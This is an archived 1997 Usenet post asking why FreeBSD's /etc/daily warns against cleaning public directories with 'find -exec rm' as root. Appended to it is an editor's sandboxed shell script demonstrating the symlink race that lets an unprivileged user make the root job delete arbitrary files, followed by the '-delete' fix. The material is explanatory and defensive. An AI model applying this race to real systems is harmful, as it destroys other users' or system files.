Path: euryale.cc.adfa.oz.au!newshost.carno.net.au!harbinger.cc.monash.edu.au!munnari.OZ.AU!news.ecn.uoknor.edu!feed1.news.erols.com!howland.erols.net!newsxfer.itd.umich.edu!yale!oitnews.harvard.edu!purdue!mozo.cc.purdue.edu!schwinger.physics.purdue.edu!ajk
From: ajk@schwinger.physics.purdue.edu (Andrew J. Korty)
Newsgroups: comp.security.unix,comp.unix.bsd.freebsd.misc
Subject: Why is cleaning /tmp with find a security problem?
Date: 20 Mar 1997 02:01:42 GMT
Organization: Purdue University
Lines: 16
Message-ID: <5gq5q6$cst@mozo.cc.purdue.edu>
NNTP-Posting-Host: schwinger.physics.purdue.edu
Xref: euryale.cc.adfa.oz.au comp.security.unix:32761 comp.unix.bsd.freebsd.misc:37322

From the stock /etc/daily distributed with FreeBSD:

# This is a security hole, never use 'find' on a public directory
# with -exec rm -f as root.  This can be exploited to delete any file
# on the system.
#
#find / \( ! -fstype local -o -fstype rdonly \) -a -prune -o \
#    \( -name '[#,]*' -o -name '.#*' -o -name a.out -o -name '*.core' \
#       -o -name '*.CKP' -o -name '.emacs_[0-9]*' \) \
#    -a -atime +3 -exec rm -f -- {} \;

Why?  The first thing that comes to mind is that it has to do with
symbolic links, but "find" won't follow them unless you tell it to.  Am I
missing something obvious?

ajk
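The following is an added example, not part of the post above or of FreeBSD's /etc/daily. It re-enacts the race the /etc/daily comment warns about with the race window frozen, so it runs deterministically and entirely inside a scratch directory created with mktemp. The point it isolates: find traverses with lstat() and will not follow a symlink it meets while walking, but the path string it hands to `-exec rm -f {}` is resolved again by the kernel when rm calls unlink(), and unlink() always follows symlinks in the intermediate components of a path. An unprivileged user who owns a directory inside the public tree can therefore let find discover an old, pattern-matching file under that directory, then rename the directory away and replace it with a symlink pointing elsewhere before rm runs. The `-atime +3` test is no obstacle, because touch -a lets the owner backdate the access time of their own file. The directory names (public, attacker/junk, victim) and the file name foo.core are constructed for this example.

```shell
#!/bin/sh
# Added example (not from the original post): a frozen re-enactment of the
# find -exec rm race. Everything lives under one mktemp sandbox; nothing
# outside it is touched. Layout (constructed for this example):
#   $sandbox/public/attacker/junk/foo.core  - the "public" tree being cleaned
#   $sandbox/victim/foo.core                - a file the cleaner must never touch

demo_rm_race() {
    sandbox=$(mktemp -d) || return 1
    public="$sandbox/public"
    victim="$sandbox/victim"
    mkdir -p "$public/attacker/junk" "$victim"
    : > "$public/attacker/junk/foo.core"
    : > "$victim/foo.core"

    # The attacker owns foo.core, so backdating its access time needs no
    # privilege; this is enough to satisfy find's "-atime +3".
    touch -a -t 199701010000 "$public/attacker/junk/foo.core"

    # Step 1: find walks the tree with lstat() (no -L/-follow), so it does
    # not follow symlinks while traversing. It decides this path is junk.
    target=$(find "$public" -name '*.core' -atime +3 -print | head -n 1)
    if [ "$target" != "$public/attacker/junk/foo.core" ]; then
        rm -rf "$sandbox"
        return 1
    fi

    # Step 2 (the race window): between find's check and rm's unlink, the
    # attacker renames the directory away and drops a same-named symlink in
    # its place. Both operations only need write access to $public/attacker.
    mv "$public/attacker/junk" "$public/attacker/junk.orig"
    ln -s "$victim" "$public/attacker/junk"

    # Step 3: rm gets the unchanged path string. unlink() re-resolves every
    # intermediate component, follows the symlink, and removes the file in
    # $victim instead of the attacker's file.
    rm -f -- "$target"

    if [ ! -e "$victim/foo.core" ] && [ -e "$public/attacker/junk.orig/foo.core" ]; then
        result=0   # victim file gone, attacker's own file untouched
    else
        result=1
    fi
    rm -rf "$sandbox"
    return "$result"
}

if demo_rm_race; then
    echo "rm followed the swapped-in symlink: the file outside the public tree was deleted"
else
    echo "the race did not reproduce"
fi
```

In the real cron job the window is the gap between find's stat of the entry and the exec'd rm's unlink, so the attacker wins by racing, not by pausing the script, but the mechanism is exactly the one shown: the check and the use happen on two different resolutions of the same path string. The `-name` patterns in the /etc/daily fragment only constrain the final path component, which the attacker also controls, so they do not close the hole. Later BSD and GNU find implementations offer a `-delete` primary that unlinks the entry relative to the directory the walk is already positioned in rather than passing a fresh path string to a separate process, which is the usual fix for this pattern; that remark is the editor's addition, not something the post states.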